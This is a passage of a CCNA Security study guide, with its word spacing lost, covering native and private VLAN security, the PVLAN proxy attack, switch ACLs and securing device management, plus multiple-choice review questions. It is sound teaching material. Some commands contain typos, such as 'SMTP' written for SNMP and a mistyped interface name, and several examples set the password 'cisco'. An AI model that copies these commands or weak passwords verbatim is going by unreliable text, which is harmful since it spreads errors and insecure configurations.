17. Whichcommandenablesportsecurityonaninterface?
A. switchportport-security
B. switchportport-securitymaximum2
C. switchportport-securityviolationshutdown
D. switchportport-securitymac-addresssticky
18. WhichofthefollowingisnotamitigationtoSTPattacks?
A. RootGuard
B. BPDUGuard
C. DisablingDTP
D. DAI
19. WhenaviolationoccursonaBPDUGuard–enabledport,inwhatstateistheportplaced?
A. Shutdown
B. Portinconsistent
C. Err-disabled
D. Restrict
20. WhichportsshouldhaveDTPdisabled?
A. Accessports
B. Trunkports
C. Etherchannels
D. Allports
Chapter7VLANSecurityCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
4.6VLANsecurity
DescribethesecurityimplicationsofaPVLAN
DescribethesecurityimplicationsofanativeVLAN
VLANscanbeusedtosegmentaLANandcanspanmultipleswitches,providingbothsecurityandtheabilitytolocateusersinthesameVLANinphysicallydispersedlocations.TherearesecurityissueswithVLANs,asyoulearnedinChapter5.ThischapterwillexpandyourknowledgeofVLANissuesbyintroducingprivateVLANs(PVLANs)andthesecurityimplicationsofdeployingthem.IwillalsotalkaboutsecurityissueswithnativeVLANs.I’llwrapupthechapterbyintroducinghowtouseaccesslistsonswitches.
Inthischapter,youwilllearnthefollowing:
SecurityimplicationsofaPVLAN
SecurityimplicationsofanativeVLAN
SwitchACLs
NativeVLANsInChapter5youlearnedaboutdoubletaggingandhowanattackercancraftapacketwithtwo802.1qtagswiththeinnertagsettotheVLANtowhichhewouldliketosendtraffic.ThisattacktakesadvantageofthenativeVLAN.Iftheattacker’saccessportissettothesameVLANasthenativeVLAN,thisattackbecomespossible.
MitigationThesolutionistosetthenativeVLAN(number1bydefault)tooneinwhichnoneoftheaccessportsresides.Thisisdoneonlyonthetrunkports.TochangethenativeVLANofthetrunkportgi0/1to78,usethefollowingcommand:
Switch79(config)#intgi0/1
Switch79(config-if)#switchporttrunknativevlan78
AfterchangingthenativeVLANfrom1to78,simplyensurethatnoaccessportsaremembersofVLAN78.
PVLANsWhenhostsaresegregatedintoVLANs,theyarealsoplacedintoseparateIPsubnets.Serviceprovidersoftenfindthisarrangementtobeproblematic,especiallywhenthereisneedforadditionalsecurityacrossaVLANbeingsharedbymultiplecustomersandperhapsbytheISPserversthemselves.WhileaseparateVLANforeachcustomerisanoption,itpresentsthefollowingchallenges:
Therequirementofahighnumberofinterfacesonserviceproviderdevicestosupportthesubnets
Theincreasedmanagementcomplexityofdividingthenetworkaddressspaceandthepotentialwastingofaddressspace
ThemanagementofmultipleACLstomaintainsecurityacrosstheVLANs
AfeaturethatcanbeasolutioninthesecasesistheimplementationofprivateVLANs.TheseprovideseparationwithinaVLANatlayer2,whilestillleavingallmembersoftheoriginalVLAN(calledtheprimaryVLAN)inthesamesubnet.CommunicationbetweenportsintheprimaryVLANiscontrollednotwithACLsbutwiththeproperassignmentofoneofthreeporttypes.
PromiscuousportsTheseareportsthatcancommunicatewithaportofanyothertype.TypicalcandidatesforthisportassignmentarethoseportsleadingtotherouterorfirewallthatactasthedefaultgatewayfortheprimaryVLAN.
IsolatedportsTheseareportsthatonlycommunicatewithapromiscuousport.TheseportsareusedtoisolateasinglehostfromallotherhostsintheprimaryVLAN.Sincetheseportscanonlycommunicatewithpromiscuousports,theonlywayanotherhostcancommunicatewithanisolatedportisthroughtherouter,whereanACLmightbeappliedforcontrol.
CommunityportsTheseareportsthatcancommunicatewithothermembersofthesamecommunityandwithpromiscuousports.Therefore,hostsconnectedtocommunityportscancommunicatewithothercommunitiesandwithisolatedportsonlythroughtherouter.
Figure7.1showsanexampleofaprimaryVLANthathasbeendividedintoPVLANs.Inthisexample,keepinmindthatallhostsconnectedtotheswitchareinthesameprimaryVLANandthesameIPsubnet.PortGe0/1isapromiscuousport,whiletheportsleadingtoSRV1andSRV2arecommunityportsthataremembersofPVLAN101.Noticetheycancommunicatewithoneanotherandwiththedefaultgatewaysinceitisapromiscuousport.
FIGURE7.1PVLANs
AlsonoticethattheportsleadingtoSRV3andSRV4areisolatedportsthataremembersofPVLAN102.NoticethateventhoughSRV3andSRV4resideinthesameprimaryVLANandthesamesecondaryVLAN(102),theycannotcommunicatewithoneanotherbecauseisolatedportscanonlycommunicatewiththepromiscuousport,whichinthiscaseisthedefaultgateway.
TosetupPVLANs,thestepsincludethefollowing:
1. ConfiguretheprimaryVLAN,specifyingitasaprimaryPVLAN.
2. ConfigureanyrequiredsecondaryPVLANs,specifyingthetype.
3. SpecifyeachinterfaceasaprivateVLANhostportandassociateitwithaprivateVLANpair.
ThefollowingarethestepstoconfigureVLAN10asaprimaryVLAN,VLAN201asanisolatedVLAN,andVLANs202and203ascommunityVLANs;toassociatetheminaprivateVLAN;andtoverifytheconfiguration:
Switch#configureterminal
Switch(config)#vlan10
Switch(config-vlan)#private-vlanprimary
Switch(config-vlan)#exit
Switch(config)#vlan201
Switch(config-vlan)#private-vlanisolated
Switch(config-vlan)#exit
Switch(config)#vlan202
Switch(config-vlan)#private-vlancommunity
Switch(config-vlan)#exit
Switch(config)#vlan203
Switch(config-vlan)#private-vlancommunity
Switch(config-vlan)#exit
Switch(config)#vlan10
Switch(config-vlan)#private-vlanassociation201-203
Switch(config-vlan)#end
Switch(config)#showvlanprivatevlan
PrimarySecondaryTypePorts
–––––––––––––––––––––––––––––––––
––––––––––––––––––––––––––––––––––––––––––
10201isolated
10202community
10203community
10204non-operational
Noticethatthelastcommand,private-vlanassociation201-203,executedundertheVLAN10configurationiswhattiesthePVLANstotheprimaryVLAN.
TosetaporttoitspropertypeandPVLAN,usethiscommand:
Switch#configureterminal
Switch(config)#interfacegigatibethernet0/22
Switch(config-if)#switchportmodeprivate-vlanhost
Switch(config-if)#switchportprivate-vlanhost-association10202
Switch(config-if)#end
Inthepreviousconfiguration,portGi0/22wasassignedtoprimaryVLAN10andPVLAN202.SincePVLAN202wascreatedasacommunityVLAN,portGi0/22willbeacommunityport.
PVLANEdge
Insomecases,youmayfindthereisnoreasonforanycommunicationbetweenportsconnectedtothesameswitch.Whenthatisthecase,itmaybebeneficialtotakeadvantageofanotherfeaturecalledthePVLANEdgefeature.PreventingcommunicationsbetweenportswhenpossiblecanbothpreventattackssuchasARPpoisoningattacksandimpairtheabilityofahackertomovefromacompromisedhosttootherhosts.
WhenaporthasbeendesignatedasaPVLANEdgeport(calledaprotectedport),ithasthefollowingfeatures:
Notrafficwillbesentfromoneprotectedporttoanotherprotectedportonthesameswitch.Anydatatrafficmustgothroughtherouterfirst.
Forwardingbehaviorbetweenaprotectedportandunprotectedportsproceedsasusual.
Thereisnoisolationbetweenprotectedportslocatedondifferentswitches.
WhilePVLANEdgeisonlyeffectivebetweenportsonthesameswitch,itissimplertoconfigurethanPVLANsandcanbethesolutionincertaincases.Tospecifyaportas“protected,”usethefollowingcommand:
Switch(config)#interfacefa0/1
Switch(config-if-range)#switchportprotected
PVLANProxyAttackAswithmanyfeatures,maliciousindividualshavefiguredoutawaytoattackPVLANconfigurations.InaPVLANproxyattack,anattackersendsapacket(usingthepromiscuousport)withthesourceIPandMACaddressoftheattacker,adestinationIPaddressofthetarget,andtheMACaddressoftherouter.Whentherouterreceivesthepacket,therouterrewritesthedestinationMACaddresstothatofthetargetandsendsthepackettothetarget.ItisthepresenceoftheMACaddressoftherouterinthepacket,ratherthanthatofthetarget,thatcausesthistobepossible.Thiscausesthepackettobecomingfromtherouter,whichisallowedsincetherouterisonapromiscuousport.SincetherouterisbeingusedasthesourceMAC,therouterisconsidereda“proxy.”Figure7.2showstheattack.
FIGURE7.2PVLANproxyattack
MitigationTopreventPVLANproxyattacks,implementACLsontherouterinterfacethatdenytrafficfromthelocalsubnettothelocalsubnet.Anexampleofsuchanaccesslist,appliedtotherouterinterface,wouldsolvetheissueshowninFigure7.2.
Router(config)#access-list101denyip172.16.0.00.0.255.255172.16.0.0
0.0.255.255
Router(config)#access-list101permitipanyany
Router(config)#intfa0/1
Router(config)#ipaccess-group101in
ACLsonSwitchesAccesslistscanbeappliednotonlytorouterinterfacesbutcanalsobeusedonlayer2interfacesonswitches.Whenusedonswitches,therearethreetypesofaccessliststhatcanbeused.
Portaccesslists(PACLs)Theseareappliedtolayer2interfaceseitheronalayer2switchoronamultilayerswitch.Whenappliedtoalayer2interfaceonamultilayerswitch,theycanbeappliedonlyinbound.TheselistscanbeeitherIPACLsorMACACLs.
VLANaccesslists(VACLs)TheseusemapstocontroltrafficonaVLAN.TheycanbeappliedeithertotrafficroutedintooroutofaVLANortoalltrafficbridgedwithinaVLAN.
RouterACLsUsedtocontroltrafficbetweenVLANs,routerACLscanbeappliedeithertoarouterinterfaceortoaswitchedvirtualinterface(SVI)onamultilayerswitch.
Firstlet’slookatconfiguringportACLs.
PortACLsPortsACLscanbeappliedeitherasIPaccesslistsorasMACaccesslists.Theproceduretocreateandapplybothtypesisasfollows:
Switch(config)#ipaccess-listextendedsimple-ip-acl
Switch(config-ext-nacl)#permithost10.0.0.1any
Switch(config)#intgi0/22
Switch(config-if)#ipaccess-groupsimple-ip-aclin
Switch(config)#macaccess-listextendedsimple-mac-acl
Switch(config-ext-nacl)#permithost0000.aaaa.bbbbany
Switch(config)#intgi0/22
Switch(config-if)#macaccess-groupsimple-ip-aclin
VLANACLsVLANaccesslistsapplytoalltrafficinaVLANandarenotconfiguredwithadirection.Theseaccesslistsusemapstodefineboththetrafficinquestionandtheactiontobetaken.Themapscanreferenceotheraccesslistswhenspecifyingthesevalues.Fromahighlevel,thestepstosetupaVACLareasfollows:
1. CreateanACLthatdefinesthespecifiedtraffictype.
2. Createamapthatreferencestheaccesslistandspecifiesanaction.
3. ApplytheaccessmaptotheappropriateVLAN.
HereisthecreationofanaccesslistdefiningthetrafficasHTTPS(port443):
Switch(config)ipaccess-listextendedpermit_HTTPS
Switch(config-ext-nacl)#permittcpanyanyeq443
ThenextstepistocreatethemapreferencingtheACLandspecifyinganaction:
Switch(config)#vlanaccess-mapAllow_HTTPS
Switch(config-access-map)#matchipaddresspermit_HTTPS
Switch(config-access-map)#actionforward
Finally,hereisthecommandtoapplytheaccessmaptoaVLAN,inthiscaseVLAN403:
Switch(config)#vlanfilterAllow_HTTPSvlan-list403
NotethatyouuseaVLANlisttospecifytheVLANstowhichthemapapplies,evenwhenthelistconsistsofonlyoneVLAN.
SummaryInthischapter,youlearnedaboutpreventingVLANhoppingattacksthattakeadvantageofthenativeVLAN.YoualsolookedathowtobreakupaVLANintoprivateVLANs.YoulearnedthatconfiguringPVLANsisamatterofsettingportsaspromiscuous,community,andisolated.
ThechapterdiscussedthePVLANEdgefeatureasanotherwayofprovidingisolationbetweenswitchports.Finally,youlearnedhowtouseACLstopreventaPVLANproxyattack.
ExamEssentialsMitigatenativeVLANsecurityissues.PreventVLANhoppingattacksthatusedoubletaggingbysettingthenativeVLANnumbertooneinwhichnoneoftheaccessportsreside.
DescribethebenefitsofPVLANs.TheseincludetheabilitytosegregatewithinaprimaryVLAN,whilesavingIPaddressspace,decreasingmanagementcomplexity,andreducingtheneedformultipleACLstomaintainsecurityacrosstheVLANs.
IdentifytheporttypesusedinPVLANs.Theseincludepromiscuous,community,andisolatedports.TheyallowforgroupingdeviceswithaVLAN(community),forisolatingdeviceswithinaVLAN(isolated),andforprovidingaccesstoalldevicesbacktotherouter(promiscuous).
ExplainthefunctionalityofthePVLANEdgefeature.Thisfeatureisusedtoprovideisolationbetweenprotectedportslocatedonthesameswitch.
MitigateaPVLANproxyattack.TopreventPVLANproxyattacks,implementACLsontherouterinterfacethatdenytrafficfromthelocalsubnettothelocalsubnet.
ReviewQuestions1. WhichofthefollowingattackstakesadvantageofthenativeVLAN?
A. Doubletagging
B. ARPpoisoning
C. Bufferoverflow
D. PVLANproxy
2. HowshouldthenativeVLANbeconfiguredtothwartadoubletaggingattack?
A. Itshouldbedisabled.
B. ItshouldbethesameVLANnumberwherehostsreside.
C. ItshouldbethesameasthemanagementVLAN.
D. ItshouldbesettoaVLANnumberinwhichnoneoftheaccessportsreside.
3. WhichofthefollowingisnottrueaboutserviceprovidersprovidingaseparateVLANpercustomer?
A. Itrequiresahighnumberofinterfacesonserviceproviderdevicestosupportthesubnets.
B. Itincreasesmanagementcomplexityofdividingthenetworkaddressspaceandthepotentialwastingofaddressspace.
C. MultipleACLsmustbemanagedtomaintainsecurityacrosstheVLANs.
D. Itdecreasessecurity.
4. Whatfeatureallowsforprovidinglayer2separationwithinaVLAN?
A. PVLANs
B. LoopGuard
C. DAI
D. RootGuard
5. WhichofthefollowingcommandschangesthenativeVLANfrom1to78?
A. switchporttrunknativevlan78
B. switchportnativevlan78
C. switchportnativevlantrunk78
D. switchportvlan78
6. WhichtypeofPVLANportcancommunicatewithaportofanyothertype?
A. Promiscuous
B. Isolated
C. Community
D. Private
7. WhichofthefollowingisnotastepinsettingupPVLANs?
A. ConfiguringtheprimaryVLAN,specifyingitasaprimaryPVLAN
B. SpecifyingeachinterfaceasaprivateVLANhostportandassociatingitwithaprivateVLANpair
C. ConfiguringanyrequiredsecondaryPVLANs,specifyingthetype
D. SettingthenativeVLANnumbertooneinwhichnoneoftheaccessportsresides
8. WhichofthefollowingcommandsconfigurestheprimaryPVLAN?
A. primary-vlanprimary
B. private-vlanprivate
C. private-vlanprimary
D. vlanprimary
9. Towhatportstateshouldthedefaultgatewayportbeset?
A. Promiscuous
B. Isolated
C. Community
D. Private
10. WhichcommandassociatestwoprivateVLANswiththeprimaryVLAN?
A. vlanassociation501-503
B. private-vlan501-503
C. private-vlanassociation501-503
D. private-vlan501-503associate
11. WhichcommandsetsaportasaPVLANport?
A. switchportmodeprivate-vlanhost
B. switchportprivate-vlanhost-association10202
C. switchporthost-association10202
D. switchportmodehost-association10202
12. WhichofthefollowingcommandsassignsaPVLANporttoitsPVLAN?
A. switchportmodeprivate-vlanhost
B. switchportprivate-vlanhost-association10202
C. switchporthost-association10202
D. switchportmodehost-association10202
13. WhichtypeofattackcanbepreventedbythePVLANEdgefeature?
A. Doubletagging
B. ARPpoisoning
C. Bufferoverflow
D. PVLANproxy
14. Whatisthepurposeofthefollowingsetofcommands?
Switch(config)#vlan10
Switch(config-vlan)#private-vlanassociation501
A. TiesthePVLAN10totheprimaryVLAN501
B. TiesthePVLAN501tothePVLAN10
C. TiesPVLAN501totheprimaryVLAN10
D. TiesthePVLAN10tothesecondaryVLAN501
15. WhatstatementisfalseaboutthePVLANEdgefeature?
A. Notrafficwillbesentfromoneprotectedporttoanotherprotectedportonthesameswitch.
B. Forwardingbehaviorbetweenaprotectedportandunprotectedportsproceedsasusual.
C. Thereisnoisolationbetweenprotectedportslocatedondifferentswitches.
D. Forwardingbetweenaprotectedportandunprotectedportsisnotpermitted.
16. WhatisaportprotectedbythePVLANEdgefeaturecalled?
A. Isolated
B. Protected
C. Hidden
D. Promiscuous
17. WhichcommandspecifiesaportasPVLANEdge?
A. switchportprotected
B. switchportedge
C. switchportsecurityedge
D. switchportprotectededge
18. WhichofthefollowingdescribesapacketsentbyanattackerattemptingthePVLANproxyattack?
A. ItcontainsasourceIPandMACaddressoftheattacker,adestinationIPaddressofthetarget,andadestinationMACaddressoftherouter.
B. ItcontainsasourceMACaddressoftheattackerandsourceIPaddressofthetarget,adestinationIPaddressofthetarget,andtheIPaddressandMACaddressoftherouter.
C. ItcontainsasourceIPaddressoftheattackerandsourceMACaddressofthetarget,adestinationIPaddressofthetarget,andtheMACaddressoftherouter.
D. ItcontainsasourceIPandMACaddressoftheattacker,adestinationIPaddressofthetarget,andtheMACaddressoftherouter.
19. InaPVLANproxyattack,whichdeviceisactingastheproxy?
A. Thetarget
B. Theattacker
C. Therouter
D. Theswitch
20. HowareVLANproxyattacksprevented?
A. ImplementACLsontherouterinterfacethatallowtrafficfromthelocalsubnettothelocalsubnet
B. ImplementACLsontherouterinterfacethatdenytrafficfromremotesubnetstothelocalsubnet
C. ImplementACLsontherouterinterfacethatdenytrafficfromthelocalsubnettoremotesubnets
D. ImplementACLsontherouterinterfacethatdenytrafficfromthelocalsubnettothelocalsubnet
Chapter8SecuringManagementTrafficCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
2.1Securemanagement
Comparein-bandandout-of-band
Configuresecurenetworkmanagement
ConfigureandverifysecureaccessthroughSNMPv3usinganACL
ConfigureandverifysecurityforNTP
UseSCPforfiletransfer
Controllingaccesstothemanagementinterfaceofarouterorswitchiscriticaltoensuringthatthereisnounauthorizedaccessthatcanintroducemaliciouschangestotheconfigurationofthedevice.Moreover,whennetworkmanagementandtimesynchronizationprotocolssuchasSMTPandNTPareinuse,accesstothisinformationmustbesecured.Finally,asatechnician,youshouldusesecureprotocolswhenperformingfiletransfers.Thischapterwillcoverallofthesesecuremanagementtopics.
Inthischapter,youwilllearnthefollowing:
Comparingin-bandandout-of-band
Configuringsecurenetworkmanagement
ConfiguringandverifyingsecureaccessthroughSNMPv3usinganACL
ConfiguringandverifyingsecurityforNTP
UsingSCPforfiletransfer
In-BandandOut-of-BandManagementManyoptionsareavailabletoconnecttoaCiscodeviceformanagingthedevice.Methodscanbeclassifiedaseitherin-bandorout-of-band.Anin-bandconnectionisonethatusesthenetworkasitstransmissionmedium.In-bandconnectiontypesincludeSNMP,virtualterminal(VTY),andHTTPSconnections.Out-of-bandconnectionsincludetheconsoleportandthe
AUXport,bothphysicalconnectionsthatdonotusethenetworkasthetransmissionmedium.Itisgoodpracticetohavebothin-bandandout-of-bandmethodsavailableforredundancy.
AUXPortTheAUXportcomprisesadirectserialconnectiontothedeviceandisconsideredanout-of-bandmethodofmanagingthedevice.OneoptionistoconnectamodemtotheAUXportanddialintothemodemwhenaccesstotheCLIisrequiredandwhennetworkaccessisnotavailable.TosetuptheAUXportforthisandtoalsosetapasswordfortheAUXport,youneedtoknowthelinenumberusedbytheAUXport.Thiscanbedeterminedwiththeshowlinecommand,asshownhere:
R1#showline
TtyTypTx/RxAModemRotyAccOAccIUsesNoiseOverrunsInt
*0CTY-----000/0
-
65AUX9600/9600-----010/0
-
66VTY-----000/0
-
67VTY-----000/0
-
Inthepreviousoutput,theAUXportisusingline65,whichyouwillneedtoreferenceinthefollowingsetofcommands,whichsettheAUXporttouseamodemwithaspeedof1115200.Thecommandsalsosettheflowcontroltohardwareandsetthepasswordtocisco.Don’tforgetthelogincommand,whichisthecommandthatspecifiesaskingforapasswordatconnectiontime!
R1#conft
R1(config)#line65
R1(config-line)#modeminout
R1(config-line)#speed115200
R1(config-line)#transportinputall
R1(config-line)#flowcontrolhardware
R1(config-line)#login
R1(config-line)#passwordcisco
R1(config-line)#end
VTYPortsThevirtualterminal(VTY)portsareconsideredanin-bandmethodastheseconnectionsusethenetworkasthetransmissionmedium.Theseportscanuseseveralprotocols,amongthemTelnetandSSH.Whileyouwilllearnlaterinthechaptertoconfigurethesecurealternativetoclear-textTelnet,hereIwillcoversecuringthelineswithpasswordsandaddingphysicalredundancytotheconnectionsbysettingaloopbackaddress.WhenaloopbackaddressisconfiguredandusedasthemanagementIPaddress,anyphysicalinterfaceonthedevicecanaccepttheconnectionattemptiftheloopbackaddressisincludedindynamicroutingadvertisementsoradvertisedviaastaticroute.Whenmanagementaccessistiedtoaphysical
IPaddress,thedevicewillbeunreachablewhenthatphysicalinterfaceisdown.
Toconfigurealoopbackaddressformanagement,usethefollowingcommand:
R1(config)#intloopback0
R1(config-if)#ipaddress192.168.5.5255.255.255.0
R1(config-if)#noshut
ToincludetheIPaddressinEIGRPorOSPFroutingadvertisements,usethefollowingcommands.Thiswillensurethatyoucanreachthisaddressfromaremotenetwork.
R1(config)#routereigrp10
R1(config-rtr)#network192.168.5.00.255.255.255
R1(config)#routerospf1
R1(config-rtr)#network192.168.5.00.255.255.255
BeforesettingapasswordontheVTYlines,youshoulddeterminehowmanyoftheselinesexistonthedevice(whichvaries)sothatyousecurethemall.UsethiscommandtolearnthenumberofVTYlines:
R1(config)#linevty?
R1(c0nfig)#linevty<015>
Nowyouknowthereare16linesonthisdevice,soreferto16lineswhenyouexecuteanycommanddesignedtoapplytoallVTYlines.TosetapasswordontheVTYlines,usethefollowingsetofcommands:
R1(config)#linevty015
R1(config-line)#passwordcisco
R1(config-line)#login
HTTPSConnectionManyCiscodevicesoffertheoptionofmanagingthedevicefromaGUIinterface.Thiswouldbeconsideredanin-bandconnectionasitusesthenetwork.WhiletheinitialconfigurationmustbecompletedattheCLI,onceaninterfacehasbeenassignedanIPaddressandisfunctionalandtheHTTPorHTTPSserverhasbeenenabled,thesedevicescanbemanagedusingthisinterface.WhiletheHTTPserveriscertainlyfunctional,whenmanagingthedevice,youshouldalwaysuseasecureconnectionasprovidedwithHTTPS.
Laterinthischapter,youwilllearnhowtoconfigureHTTPS.
SNMPAnotheroptionforconfigurationmanagementisSNMP.Aswithothermethodsthatusethenetworkasatransmissionmedium,itisalsoconsideredanin-bandmethod.SMTPstoresthesettingsinaMIB.Thisisarepositorywithahierarchicalstructurewithstandardizedlocationsforeachpieceofconfigurationorstatusinformation.TheselocationsandtheirassociateddataarecalledOIDs.TheOIDnumberdescribesthepaththroughthetree-likestructurewherethespecificpieceofinformationislocated.Figure8.1showsaportionoftheMIB.Anexampleof
anOIDwouldbe1.3.6.1.2.1.1.5(systemname),whichwouldbeoneofthesubsectionsofsysDescr(1.3.6.2.1.1).
FIGURE8.1PartialMIB
Noticealsothatthereisaprivatebranchinthetreewherevendorscanincludesettingsandstatusinformationthatmightbeuniquetotheirproducts.Therefore,thepathtoCisco-specificdatais1.3.6.1.4.1.9.Accesstoinformationstoredbyanindividualdeviceisdoneusinggetorsetcommands,whilereferencingtheOID.getcommandsretrieveinformation,whilesetcommandsmakeconfigurationchangestoIODsthatcanbechanged.SNMPalsoallowsforthecreationoftrapsondevices,whichcantriggeramessagetothemanagementstationwhenathresholdismetoraneventoccurs.InSMTPversion2,thesetrapmessagesarecalledinforms.
SNMPhasundergonethreeversionchangesovertheyears.Versions1and2usedtheknowledgeofacommunitystringastheaccesscontrolmechanismtotheMIBsofthedevices.Asthisisquiteaflimsysecuritysystem,version3adoptedauser-basedsecuritymodelthatprovidesforauthentication,integrityhashing,andencryptionoftransmissions.Thesefunctionscanbeconfiguredusingthreemodesthatrepresentvariouscombinationsofthesecapabilities.
noAuthNoPriv:Nohashingtosecureauthenticationorencryptionofdata(referencedasnoauthinthecommand)
AuthNoPriv:Hashingtosecureauthenticationbutnoencryptionofdata(referencedasauthinthecommand)
AuthPriv:Hashingtosecureauthenticationandencryptionofdata(referencedasprivin
thecommand)
Laterinthischapter,youwilllearnhowtoconfigureSNMPv3.
ConsolePortTheconsoleportalsocomprisesaserialconnectionthatisconsideredanout-of-bandconnection.Accesscontrolcanbeappliedtothisinterfacebyusingthelineconsole0command.Forexample,hereIhaveappliedapasswordinthissinglelineandbyusingthelogincommandhavespecifiedthatthepasswordisrequired:
R83(config)lineconsole0
R83(config-line)#passwordcisco
R83(config-line)#login
SecuringNetworkManagementRegardlessoftheinterfacewithwhichyoumanageaCiscodevice,youshouldensurethatthemethodusedissecure.Inthissection,you’lllookatsecuringVTYportsandHTTPconnectionsandusingACLsasafurtherlineofdefenseinprotectingthesecriticalmanagementinterfaces.Finally,I’lldiscussbannermessagesandtheroletheycanplayinsecuringmanagementinterfaces.
SSHWhenaccessingadeviceusingtheVTYports,youshouldalwaysconfigureanduseSSHratherthanTelnetfortheconnection.FormoreinformationonconfiguringSSH,seeChapter4.
HTTPSTodisabletheHTTPserverandenabletheHTTPSserver,executethefollowingcommands:
R81(config)#noiphttpserver
R81(config)#iphttpssecure-server
R81(config)#copyrunstart
Oncethesecommandsareexecuted,thedevicewillgenerateanRSAkeyandwillusethekeytoencryptalltransmissions.
ACLsAnadditionallayerofsecuritythatcanbeappliedtoanymanagementinterfaceistheapplicationofACLs.AftertheACLhasbeencreated,itcanbeappliedtotheVTY,HTTPS,andSNMPv3processes.Forexample,considerthefollowingaccesslistthatallowsaccessonlytoandfromhostsinthe192.168.5.0/24network(presumablyonethatcontainsonlymanagementstations).
R84(config)#access-list99permit192.168.5.00.0.0.255
ThisACLcanbeappliedtoeachofthesemanagementinterfacesasfollows:
SSH
R84(config)#linevty015
R84(config-line)#access-class99in
HTTPS
R84(config)#iphttpaccess-class99
SNMPv3ToapplyACL99atthegrouplevel,usethiscommand,whichreferstothegrouptest-groupusingtheprivsecuritypolicywithwriteaccesstoaviewcalledwrite-view:
R84(config)#snmp-servergrouptest-groupv3privwritewrite-viewaccess99
ToapplyACL99attheuserlevel,usethefollowingcommand,whichreferstoausernamednms-userwhoisamemberofthegroupnms-groupusingtheauthsecuritypolicy.ThispolicyusesSHAhashingforauthenticationwithasharedsecretofauth-pass.Ituses128-bitAESforencryptionusingasharedsecretofpriv-pass.The99attheendofthecommandisthereferencetocontrollingaccesswithACL99.
R84(config)#snmp-serverusernms-usernms-groupv3authshaauth-passpriv
aes128priv-pass99
BannerMessagesWhilebannermessageswillneverpreventunauthorizedaccesstoadevice,theyshouldbeimplementedtoprovidelegalnoticetounauthorizedindividualsthattheyarebreakingthelawwhenattemptingtoachieveunauthorizedaccess.Whilethespecificwordingrequiredforthisvariesfromjurisdictiontojurisdiction,therearesomegeneralguidelinesregardingthiswording.
UseofwordssuchasWelcomemaybeusedlaterasadefensethataccesswasencouraged.
IfyouplantouseAAAaccountingrecordsinanysubsequentlegalproceeding,youmustinformintruderstheyarebeingaudited.
Youshouldalwaysstatetheownerofthesystemsotherewillbenolaterdefensethattheintruderwasunawareofthesystemowner.
Topreventanyfuturedefensethatpermissionwasimplied,alwaysstate“authorizedaccessonly.”
Therearethreetypesofbannermessage,andtheydifferinwhentheyaredisplayed.Let’slookatconfiguringeachtypeanddiscusswhentheywillappear.Themessagesuseddonotconstituteanyrecommendationsastowording.
MessageoftheDay(MOTD)
Amessageoftheday(MOTD)appearsatconnectiontimeandbeforetheloginbanner(ifconfigured).Theymaybeusedtocommunicatescheduledmaintenancewindowsorothergeneralinformation.Tocreateamessagethatsays“Wewillbedownfor2hoursat12p.m.,”usethefollowingcommand.Themessagecanbesurroundedwithanycharacter(inthiscase')aslongasthatcharacterdoesnotappearinthemessage.
R85(config)#bannermotd'
Entertextmessage,Endwithcharacter'''
Wewillbedownfor2hoursat12PM.'
EXECBannerThisbannerappearsaftersuccessfulauthenticationbutbeforethefirstcommandpromptappears.ToconfiguretheEXECbannertosay“Thisisyourlastchancetoleaveifyouareunauthorized,”usethiscommand:
R85(config)#bannerexec'
Entertextmessage,Endwithcharacter'''
Thisisyourlastchancetoleaveifyouareunauthorized.'
LoginBannerThisbannerappearsaftertheMOTDbanner(ifconfigured),beforetheloginprompt,andbeforetheEXECbanner(ifconfigured).Toconfiguretheloginbannertosay“Thisisyourfirstchancetoleaveifyouareunauthorized,”usethiscommand:
R85(config)#bannerlogin'
Entertextmessage,Endwithcharacter'''
Thisisyourfirstchancetoleaveifyouareunauthorized.'
VerificationTocheckyourwork,let’sconnectfromR86usingTelnetandseewhatyouget:
R86#telnet10.10.10.10
Trying10.10.10.10...Open
Wewillbedownfor2hoursat12PM
Thisisyourfirstchancetoleaveifyouareunauthorized
Username:Admin
Password:<hidden>
Thisisyourlastchancetoleaveifyouareunauthorized
Asyoucansee,youreceivedthemessagesasconfiguredintheorderyouexpected.
SecuringAccessthroughSNMPv3ConfiguringSNMPrequiresyoutosetanengineIDforanydeviceusedtomanageSNMP.ThisisanIDnumbercomposedof24hexcharacters.Wheninformmessagesaresenttostations,itistheengineIDthatidentifiesthestation.Itisenteredasa12-characterstring.SettingtheSNMPv3engineIDforthemanagementstationonarouterisdoneasfollows:
R82(config)#snmp-serverengineIDlocal000010000203
OncetheengineIDhasbeendefined,thehigh-levelstepstocontrolaccesstoSNMPareasfollows:
1. DefineanSNMPgroupandspecifythecryptographicpolicytobeusedbythegroup.Inthissamecommand,youcanassignanMIBview.
2. DefineSNMPusersandassignthemausergroup,aview,anauthenticationhashingalgorithmandsharedsecret,andwhenusedanencryptionalgorithm.
3. DefineSNMPviews,eachofwhichwillcontroltheinformationthatcanbeaccessedbyuserswhohavebeenassignedtheview.
4. DefinetheSNMPhostthatwillbetherecipientoftraps.Youwillalsospecifyinthesamecommandtheuseraccount(andthealgorithmsandkeysassociatedwiththataccount)underwhosesecuritycontextthetrapswillbesent.
Firstlet’sdefineanSMTPgroupnamedsnmp-group,specifyversion3,andsetittousetheprivsecuritypolicyandtohaveread-onlyaccesstotheviewnamedread-view(tobecreatedinalaterstep).
R82(config)#snmp-servergroupsnmp-groupv3privreadread-view
Nextlet’sdefineanSNMPusernamedread-user,assigntheusertothegroupsnmp-group,settheversionasversion3,configureSHAastheauthenticationalgorithmusingasharedkeyoftroy-key,andconfigure128-bitAESastheencryptionalgorithmusingmac-keyasthesharedkeyforAES.
R82(config)#snmp-serveruserread-usersnmp-groupv3authshatroy-keypriv
aes128mac-key
Nowlet’sdefinetheviewthatyoureferencedinthecommandcreatingthegroup.TheviewwillonlyallowreadaccesstotheOID1.3.6.1.2.1andbelow.
R82(config)#snmp-serverviewread-view1.3.6.1.2.1included
Finally,let’ssettheIPaddressofthemanagementstationtowhichanytrapsshouldbesentalongwiththeversionnumber,acryptographicpolicyofauth,andauseraccountnamedtest-userunderwhosesecuritycontextthetrapswillbesent.Thisisanaccountyoudidnotcreateinthisexample.
R82(config)#snmp-serverhost10.10.10.10version3privtest-user
SecuringNTPSynchronizationoftimeamonginfrastructuredeviceshasbecomemoreandmorecriticaltotheproperoperationofnetworks.Digitalcertificateshaveexplicitvalidityperiods,certainWindowsoperationsrequirestricttimesynchronization,andanalysisofintegratedlogfiles
becomesanightmarewhenthedevicesfromwhichthelogfilescomehavenotbeensynchronized.Moreover,somecompliancestandardscallforstricttimesynchronization.
